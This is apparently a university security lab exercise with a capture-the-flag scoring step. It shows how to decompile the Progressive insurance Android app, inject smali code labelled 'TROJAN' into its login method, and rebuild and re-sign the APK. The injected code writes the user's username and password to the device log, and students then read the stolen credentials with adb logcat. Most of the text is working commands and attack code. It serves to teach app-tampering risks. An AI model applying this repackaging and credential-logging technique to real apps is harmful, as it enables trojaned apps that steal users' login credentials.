M 401: Trojaning the Progressive App (20 pts)

What You Need for This Project

An Android Studio emulator running on your host system
A Debian Linux machine
You should have that already set up from previous projects

Purpose

To practice unpacking an unprotected app, modifying it, and creating a modified app. This should not be easy to do, but it is because many companies don't bother to obfuscate their Dalvik code.

Responsible Disclosure

I notified Progressive about this in 2015 but they did not fix it.

Setup

These instructions assume you have a setup as shown below, with a Windows or MacOS host system and Debian Linux and Android guest systems.

The guest systems may be running behind virtual routers, or in the cloud, so networking between the Debian and Android systems may be difficult.

Installing adb, jarsigner, and JDK

On Linux, execute these commands:

sudo apt update sudo apt install android-tools-adb -y wget --no-check-certificate https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool wget --no-check-certificate https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.7.0.jar mv apktool_2.7.0.jar apktool.jar sudo mv apktool.jar /usr/bin sudo mv apktool /usr/bin sudo chmod +x /usr/bin/apktool* sudo apt install default-jdk -y

Downloading the Progressive App on Linux

On Linux, execute this command:

wget https://samsclass.info/128/proj/prog/base.apk

Disassembling the APK with apktool

On Linux, in a Terminal, execute this command:

apktool d -f -r base.apk

Apktool disassembles the app, as shown below.

Exploring the Smali Code

After decoding, the Dalvik bytecode appears in a folder named "base", in many subfolders, as shown below.

It might seem difficult to hunt through all those files and folders for important items, but it's easy to do because the code is not obfuscated, and contains easily-guessed object names.

Finding Interesting Code with Grep

Start in the directory containing your APK file, such as Downloads.

Execute this command:

grep -ir login . | grep password

This finds lines containing both "login" and "password", as shown below.

The lines are wide and wrap in a way that makes them difficult to read, so use "less" to clean them up:

grep -ir login . | grep password | less -S

Now it's easy to see that only a few files have interesting content. We'll edit the file highlighted in the image below.

Press Q to exit "less".

Viewing Smali Code

Execute this command:

nano ./base/smali_classes2/com/phonevalley/progressive/login/viewmodel/LoginViewModel.smali

The Smali file opens in nano. Type Ctrl+W to start a search. Type in this search string, as shown below.

loginOnlineAccount(

Press Enter. Type Ctrl+W again. Press Enter again.

You see the start of the ".method private loginOnlineAccount(" function, as shown below.

Inserting Trojan Code

We'll add code that puts the username and password into the log.

Notice the line highlighted in the image above that says:

.locals 5

That line reserves five local variables for use in this method. We need another variable to use, so change that line to:

.locals 6

as shown below.

Scroll down a little, and look at the code below the ".line 434" mark, as shown below.

This code puts the username into variable v2 and the password into variable v3. All we need to do is to put those variables into the log.

Carefully insert this code after the second "check-cast" statement, as shown below.

# TROJAN const-string v5, "TROJAN Stealing Progressive Credentials:" invoke-static {v5, v2}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I invoke-static {v5, v3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I # END OF TROJAN

Press Ctrl+X, Y, Enter to save the modified file.

Rebuilding the App

To build a new APK file from the modified code in the "base" directory,execute this command:

apktool b base

Apktool builds the app, as shown below.

Making a Code Signing Certificate

Android won't run unsigned apps, so we need a signing certificate.

Execute this command:

keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

A prompt asks for a "keystore password". Enter password twice.

Then a series of question asks for your name, etc. You can press Enter for each question except the last one, which you must answer yes to, as shown below.

Signing the New APK

Execute this command:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore base/dist/base.apk alias_name

When you are prompted to, enter the key store password of password

The app is signed, as shown below.

Moving the Modified App to your Host System

Now you need to move the APK file you created from your Linux system to your host system.

The process is different for Windows and MacOS systems. Follow the appropriate steps below.

Windows Users
If you are using Windows, perform these steps.

Installing the Windows Client
On your Windows machine, in a Web browser, go to
https://winscp.net/eng/index.php
Download and install WinSCP, as shown below.
When WinSCP launches, fill in the IP address, username, and password of your Linux server, as shown below.
Click Login. Click Yes. Click Continue.
In the right pane, navigate to the ~/base/dist/base.apk file, as shown below.
Don't use the base.apk file in your home folder--that's the unmodified app!
In the left pane, double-click the first item, labelled ... Double-click Desktop.
Drag the ~/base/dist/base.apk file from the right pane to the left pane.
Then close WinSCP.
The base.apk file appears on your desktop.

MacOS Users
If you are using MacOS, open a Terminal and execute this command, replacing the IP address with the IP address of your Linux system:
scp debian@172.16.123.130:~/base/dist/base.apk Desktop
Enter your password when you are prompted to.
The base.apk file appears on your desktop.

Installing the Modified App

Drag the base.apk file from your host system's desktop and drop it on your emulated Android device.

Monitoring the Log

These commands are different for Windows and MacOS.

Follow the appropriate steps below to start monitoring the Android log for lines containing the word "TROJAN":

Windows Users
In a Command Prompt, execute these commands:
cd cd AppData\Local\Android\sdk\platform-tools adb logcat | findstr TROJAN

MacOS Users
In a Terminal, execute these commands:
cd cd Library/Android/sdk/platform-tools ./adb logcat | grep TROJAN

Using the Modified App

On your Android device, open the Progressive app.

If an "Update Recommended" box appears, click "NO THANKS".

Enter fake credentials, using your name as the login name, as shown below. Click "Log in".

Viewing the Stolen Data

Your Terminal window should show the stolen data, as shown below.

M 401.1: Log Entry (20 pts)
Find the text covered by a green box in the image below. That's the flag.

Updated for modern setup 10-16-22
Install switch changed to -y on 10-22-22
Version of apktool updated 6-22-23